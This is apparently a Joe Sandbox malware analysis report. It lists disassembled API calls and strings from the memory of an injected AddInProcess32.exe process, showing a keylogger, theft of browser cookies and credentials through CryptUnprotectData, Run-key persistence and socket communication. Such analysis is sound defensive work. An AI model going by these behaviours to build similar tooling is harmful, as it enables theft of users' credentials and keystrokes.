                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                            • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                            • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                            • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                            APIs
                                            • _free.LIBCMT ref: 00444106
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 00444118
                                            • _free.LIBCMT ref: 0044412B
                                            • _free.LIBCMT ref: 0044413C
                                            • _free.LIBCMT ref: 0044414D
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                            • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                            • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                            • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: PkGNG
                                            • API String ID: 0-263838557
                                            • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                            • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                            • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                            • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                            APIs
                                            • _strpbrk.LIBCMT ref: 0044E7B8
                                            • _free.LIBCMT ref: 0044E8D5
                                              • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                              • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                              • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                            • String ID: *?$.
                                            • API String ID: 2812119850-3972193922
                                            • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                            • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                            • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                            • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountEventTick
                                            • String ID: !D@$NG
                                            • API String ID: 180926312-2721294649
                                            • Opcode ID: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                            • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                            • Opcode Fuzzy Hash: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                            • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                            APIs
                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                              • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                                            • String ID: XQG$NG$PG
                                            • API String ID: 1634807452-3565412412
                                            • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                            • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                            • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                            • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                            • _free.LIBCMT ref: 004435E0
                                            • _free.LIBCMT ref: 004435EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$FileModuleName
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            • API String ID: 2506810119-760905667
                                            • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                            • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                            • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                            • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                            • GetLastError.KERNEL32 ref: 0044B9B1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                            • String ID: PkGNG
                                            • API String ID: 2456169464-263838557
                                            • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                            • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                            • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                            • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                            • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                            • String ID: /sort "Visit Time" /stext "$0NG
                                            • API String ID: 368326130-3219657780
                                            • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                            • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                            • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                            • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                            APIs
                                            • _wcslen.LIBCMT ref: 00416330
                                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                              • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                              • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                              • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _wcslen$CloseCreateValue
                                            • String ID: !D@$okmode$PG
                                            • API String ID: 3411444782-3370592832
                                            • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                            • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                            • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                            • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                            APIs
                                              • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                            Strings
                                            • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                            • API String ID: 1174141254-1980882731
                                            • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                            • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                            • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                            • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                            APIs
                                              • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                            Strings
                                            • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                            • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                            • API String ID: 1174141254-1980882731
                                            • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                            • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                            • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                            • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread$LocalTimewsprintf
                                            • String ID: Offline Keylogger Started
                                            • API String ID: 465354869-4114347211
                                            • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                            • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                            • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                            • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                            APIs
                                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                            • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread$LocalTime$wsprintf
                                            • String ID: Online Keylogger Started
                                            • API String ID: 112202259-1258561607
                                            • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                            • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                            • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                            • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                            APIs
                                            • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                            • API String ID: 481472006-3277280411
                                            • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                            • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                            • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                            • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 00404F81
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                            • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                            Strings
                                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Create$EventLocalThreadTime
                                            • String ID: KeepAlive | Enabled | Timeout:
                                            • API String ID: 2532271599-1507639952
                                            • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                            • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                            • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                            • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                            APIs
                                            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                            • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: CryptUnprotectData$crypt32
                                            • API String ID: 2574300362-2380590389
                                            • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                            • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                            • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                            • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                            APIs
                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                            • GetLastError.KERNEL32 ref: 0044C316
                                            • __dosmaperr.LIBCMT ref: 0044C31D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastPointer__dosmaperr
                                            • String ID: PkGNG
                                            • API String ID: 2336955059-263838557
                                            • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                            • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                            • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                            • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                            • CloseHandle.KERNEL32(?), ref: 004051CA
                                            • SetEvent.KERNEL32(?), ref: 004051D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandleObjectSingleWait
                                            • String ID: Connection Timeout
                                            • API String ID: 2055531096-499159329
                                            • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                            • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                            • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                            • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                            APIs
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 2005118841-1866435925
                                            • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                            • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                            • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                            • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                            APIs
                                            • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                            • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FormatFreeLocalMessage
                                            • String ID: @J@$PkGNG
                                            • API String ID: 1427518018-1416487119
                                            • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                            • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                            • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                            • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                            APIs
                                            • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                            • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateValue
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                            • API String ID: 1818849710-1051519024
                                            • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                            • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                            • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                            • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                              • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                            • String ID: bad locale name
                                            • API String ID: 3628047217-1405518554
                                            • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                            • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                            • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                            • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                            • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                            • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateValue
                                            • String ID: Control Panel\Desktop
                                            • API String ID: 1818849710-27424756
